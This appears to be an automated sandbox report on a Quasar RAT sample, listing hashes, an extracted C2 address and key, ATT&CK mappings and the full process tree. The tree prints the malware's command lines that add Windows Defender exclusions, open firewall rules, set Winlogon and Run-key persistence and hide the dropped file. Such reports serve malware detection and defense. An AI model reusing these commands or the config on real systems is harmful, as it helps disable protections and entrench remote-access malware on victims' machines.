Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
01-11-2024 17:31
Static task
static1
Behavioral task
behavioral1
Sample
c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe
Resource
win10v2004-20241007-en
General
-
Target
c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe
-
Size
1.4MB
-
MD5
f26ef938c2c4235c5e4cdb4ebb801fca
-
SHA1
7c3413c638ea0c93cf2951cf05249df89bd98ff8
-
SHA256
c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272
-
SHA512
84d9d421b6794d412f55d8db296d55b46d25c0980da4a75eacf39d9ad912403bfd0a09142c907328df47b0a676826bd8a0ac422d6e89541da5ca49c13f073096
-
SSDEEP
24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config
Extracted
quasar
1.3.0.0
-
94.131.105.161:12344
QSR_MUTEX_UEgITWnMKnRP3EZFzK
-
encryption_key
5Q0JQBQQfAUHRJTcAIOF
-
install_name
lient.exe
-
log_directory
Lugs
-
reconnect_delay
3000
-
startup_key
itartup
-
subdirectory
SubDir
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\rot.exe," reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\rot.exe," reg.exe -
Quasar family
-
Quasar payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/2788-95-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/2788-97-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/2788-100-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/2788-102-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/2788-101-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2780 powershell.exe 2552 powershell.exe 1388 powershell.exe 1472 powershell.exe 436 powershell.exe 580 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 2356 netsh.exe 2148 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule behavioral1/files/0x0003000000018334-54.dat acprotect -
Executes dropped EXE 4 IoCs
Processes:
7z.exeratt.exeratt.exerot.exepid Process 3004 7z.exe 1636 ratt.exe 720 ratt.exe 1288 rot.exe -
Loads dropped DLL 6 IoCs
Processes:
cmd.exe7z.exepowershell.execmd.exepid Process 2928 cmd.exe 2928 cmd.exe 3004 7z.exe 580 powershell.exe 2928 cmd.exe 1532 cmd.exe -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe" reg.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
rot.exedescription pid Process procid_target PID 1288 set thread context of 2788 1288 rot.exe 70 -
Processes:
resource yara_rule behavioral1/files/0x0009000000018b28-48.dat upx behavioral1/memory/3004-53-0x0000000000400000-0x0000000000432000-memory.dmp upx behavioral1/files/0x0003000000018334-54.dat upx behavioral1/memory/3004-56-0x0000000010000000-0x00000000100E2000-memory.dmp upx behavioral1/memory/3004-58-0x0000000000400000-0x0000000000432000-memory.dmp upx behavioral1/memory/3004-62-0x0000000000400000-0x0000000000432000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 36 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
PING.EXEInstallUtil.exenslookup.exepowershell.exereg.exereg.execmd.exeWMIC.exenetsh.exereg.execmd.execmd.execmd.exePING.EXEcmd.execmd.exepowershell.exepowershell.exenetsh.exeratt.exePING.EXErot.exepowershell.exePING.EXEc5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exepowershell.exe7z.execmd.exeWMIC.exeattrib.execmd.exePING.EXEpowershell.execmd.exeWMIC.exeratt.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ratt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ratt.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 9 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.execmd.exePING.EXEcmd.exePING.EXEPING.EXEPING.EXEPING.EXEcmd.exepid Process 880 cmd.exe 680 cmd.exe 2092 PING.EXE 2736 cmd.exe 1332 PING.EXE 2604 PING.EXE 2568 PING.EXE 1648 PING.EXE 1532 cmd.exe -
Runs ping.exe 1 TTPs 5 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid Process 2092 PING.EXE 1648 PING.EXE 1332 PING.EXE 2604 PING.EXE 2568 PING.EXE -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeratt.exeratt.exerot.exepid Process 2780 powershell.exe 2552 powershell.exe 1388 powershell.exe 1472 powershell.exe 436 powershell.exe 580 powershell.exe 1636 ratt.exe 720 ratt.exe 1636 ratt.exe 720 ratt.exe 1636 ratt.exe 720 ratt.exe 1636 ratt.exe 720 ratt.exe 1288 rot.exe 1288 rot.exe 1288 rot.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeIncreaseQuotaPrivilege 2996 WMIC.exe Token: SeSecurityPrivilege 2996 WMIC.exe Token: SeTakeOwnershipPrivilege 2996 WMIC.exe Token: SeLoadDriverPrivilege 2996 WMIC.exe Token: SeSystemProfilePrivilege 2996 WMIC.exe Token: SeSystemtimePrivilege 2996 WMIC.exe Token: SeProfSingleProcessPrivilege 2996 WMIC.exe Token: SeIncBasePriorityPrivilege 2996 WMIC.exe Token: SeCreatePagefilePrivilege 2996 WMIC.exe Token: SeBackupPrivilege 2996 WMIC.exe Token: SeRestorePrivilege 2996 WMIC.exe Token: SeShutdownPrivilege 2996 WMIC.exe Token: SeDebugPrivilege 2996 WMIC.exe Token: SeSystemEnvironmentPrivilege 2996 WMIC.exe Token: SeRemoteShutdownPrivilege 2996 WMIC.exe Token: SeUndockPrivilege 2996 WMIC.exe Token: SeManageVolumePrivilege 2996 WMIC.exe Token: 33 2996 WMIC.exe Token: 34 2996 WMIC.exe Token: 35 2996 WMIC.exe Token: SeIncreaseQuotaPrivilege 2996 WMIC.exe Token: SeSecurityPrivilege 2996 WMIC.exe Token: SeTakeOwnershipPrivilege 2996 WMIC.exe Token: SeLoadDriverPrivilege 2996 WMIC.exe Token: SeSystemProfilePrivilege 2996 WMIC.exe Token: SeSystemtimePrivilege 2996 WMIC.exe Token: SeProfSingleProcessPrivilege 2996 WMIC.exe Token: SeIncBasePriorityPrivilege 2996 WMIC.exe Token: SeCreatePagefilePrivilege 2996 WMIC.exe Token: SeBackupPrivilege 2996 WMIC.exe Token: SeRestorePrivilege 2996 WMIC.exe Token: SeShutdownPrivilege 2996 WMIC.exe Token: SeDebugPrivilege 2996 WMIC.exe Token: SeSystemEnvironmentPrivilege 2996 WMIC.exe Token: SeRemoteShutdownPrivilege 2996 WMIC.exe Token: SeUndockPrivilege 2996 WMIC.exe Token: SeManageVolumePrivilege 2996 WMIC.exe Token: 33 2996 WMIC.exe Token: 34 2996 WMIC.exe Token: 35 2996 WMIC.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 2552 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeIncreaseQuotaPrivilege 2632 WMIC.exe Token: SeSecurityPrivilege 2632 WMIC.exe Token: SeTakeOwnershipPrivilege 2632 WMIC.exe Token: SeLoadDriverPrivilege 2632 WMIC.exe Token: SeSystemProfilePrivilege 2632 WMIC.exe Token: SeSystemtimePrivilege 2632 WMIC.exe Token: SeProfSingleProcessPrivilege 2632 WMIC.exe Token: SeIncBasePriorityPrivilege 2632 WMIC.exe Token: SeCreatePagefilePrivilege 2632 WMIC.exe Token: SeBackupPrivilege 2632 WMIC.exe Token: SeRestorePrivilege 2632 WMIC.exe Token: SeShutdownPrivilege 2632 WMIC.exe Token: SeDebugPrivilege 2632 WMIC.exe Token: SeSystemEnvironmentPrivilege 2632 WMIC.exe Token: SeRemoteShutdownPrivilege 2632 WMIC.exe Token: SeUndockPrivilege 2632 WMIC.exe Token: SeManageVolumePrivilege 2632 WMIC.exe Token: 33 2632 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
InstallUtil.exepid Process 2788 InstallUtil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.execmd.execmd.execmd.exepowershell.execmd.exedescription pid Process procid_target PID 2512 wrote to memory of 2928 2512 c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe 30 PID 2512 wrote to memory of 2928 2512 c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe 30 PID 2512 wrote to memory of 2928 2512 c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe 30 PID 2512 wrote to memory of 2928 2512 c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe 30 PID 2928 wrote to memory of 2896 2928 cmd.exe 32 PID 2928 wrote to memory of 2896 2928 cmd.exe 32 PID 2928 wrote to memory of 2896 2928 cmd.exe 32 PID 2928 wrote to memory of 2896 2928 cmd.exe 32 PID 2896 wrote to memory of 2904 2896 cmd.exe 33 PID 2896 wrote to memory of 2904 2896 cmd.exe 33 PID 2896 wrote to memory of 2904 2896 cmd.exe 33 PID 2896 wrote to memory of 2904 2896 cmd.exe 33 PID 2928 wrote to memory of 2032 2928 cmd.exe 34 PID 2928 wrote to memory of 2032 2928 cmd.exe 34 PID 2928 wrote to memory of 2032 2928 cmd.exe 34 PID 2928 wrote to memory of 2032 2928 cmd.exe 34 PID 2032 wrote to memory of 2996 2032 cmd.exe 35 PID 2032 wrote to memory of 2996 2032 cmd.exe 35 PID 2032 wrote to memory of 2996 2032 cmd.exe 35 PID 2032 wrote to memory of 2996 2032 cmd.exe 35 PID 2928 wrote to memory of 2780 2928 cmd.exe 37 PID 2928 wrote to memory of 2780 2928 cmd.exe 37 PID 2928 wrote to memory of 2780 2928 cmd.exe 37 PID 2928 wrote to memory of 2780 2928 cmd.exe 37 PID 2928 wrote to memory of 2552 2928 cmd.exe 38 PID 2928 wrote to memory of 2552 2928 cmd.exe 38 PID 2928 wrote to memory of 2552 2928 cmd.exe 38 PID 2928 wrote to memory of 2552 2928 cmd.exe 38 PID 2928 wrote to memory of 1388 2928 cmd.exe 39 PID 2928 wrote to memory of 1388 2928 cmd.exe 39 PID 2928 wrote to memory of 1388 2928 cmd.exe 39 PID 2928 wrote to memory of 1388 2928 cmd.exe 39 PID 2928 wrote to memory of 1472 2928 cmd.exe 40 PID 2928 wrote to memory of 1472 2928 cmd.exe 40 PID 2928 wrote to memory of 1472 2928 cmd.exe 40 PID 2928 wrote to memory of 1472 2928 cmd.exe 40 PID 2928 wrote to memory of 436 2928 cmd.exe 41 PID 2928 wrote to memory of 436 2928 cmd.exe 41 PID 2928 wrote to memory of 436 2928 cmd.exe 41 PID 2928 wrote to memory of 436 2928 cmd.exe 41 PID 2928 wrote to memory of 3004 2928 cmd.exe 42 PID 2928 wrote to memory of 3004 2928 cmd.exe 42 PID 2928 wrote to memory of 3004 2928 cmd.exe 42 PID 2928 wrote to memory of 3004 2928 cmd.exe 42 PID 2928 wrote to memory of 580 2928 cmd.exe 43 PID 2928 wrote to memory of 580 2928 cmd.exe 43 PID 2928 wrote to memory of 580 2928 cmd.exe 43 PID 2928 wrote to memory of 580 2928 cmd.exe 43 PID 580 wrote to memory of 2356 580 powershell.exe 44 PID 580 wrote to memory of 2356 580 powershell.exe 44 PID 580 wrote to memory of 2356 580 powershell.exe 44 PID 580 wrote to memory of 2356 580 powershell.exe 44 PID 580 wrote to memory of 2148 580 powershell.exe 45 PID 580 wrote to memory of 2148 580 powershell.exe 45 PID 580 wrote to memory of 2148 580 powershell.exe 45 PID 580 wrote to memory of 2148 580 powershell.exe 45 PID 580 wrote to memory of 2232 580 powershell.exe 46 PID 580 wrote to memory of 2232 580 powershell.exe 46 PID 580 wrote to memory of 2232 580 powershell.exe 46 PID 580 wrote to memory of 2232 580 powershell.exe 46 PID 2232 wrote to memory of 2632 2232 cmd.exe 47 PID 2232 wrote to memory of 2632 2232 cmd.exe 47 PID 2232 wrote to memory of 2632 2232 cmd.exe 47 PID 2232 wrote to memory of 2632 2232 cmd.exe 47 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe"C:\Users\Admin\AppData\Local\Temp\c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com4⤵
- System Location Discovery: System Language Discovery
PID:2904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get Domain4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Users\Admin\AppData\Local\Temp\7z.exe7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2356
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2148
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem where name="BCXRJFKE" set AutomaticManagedPagefile=False5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1820 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=200005⤵
- System Location Discovery: System Language Discovery
PID:1596
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1636 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:880 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 86⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2092
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"6⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 20 > nul && "C:\Users\Admin\Music\rot.exe"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2736 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 206⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1332
-
-
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2584
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1684
-
-
C:\Users\Admin\AppData\Local\Temp\ratt.exe"ratt.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:720 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:680 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 75⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1648
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\Music\rot.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1532 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 145⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2604
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 145⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2568
-
-
C:\Users\Admin\Music\rot.exe"C:\Users\Admin\Music\rot.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1288 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2788
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
1KB
MD50df43097e0f0acd04d9e17fb43d618b9
SHA169b3ade12cb228393a93624e65f41604a17c83b6
SHA256c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
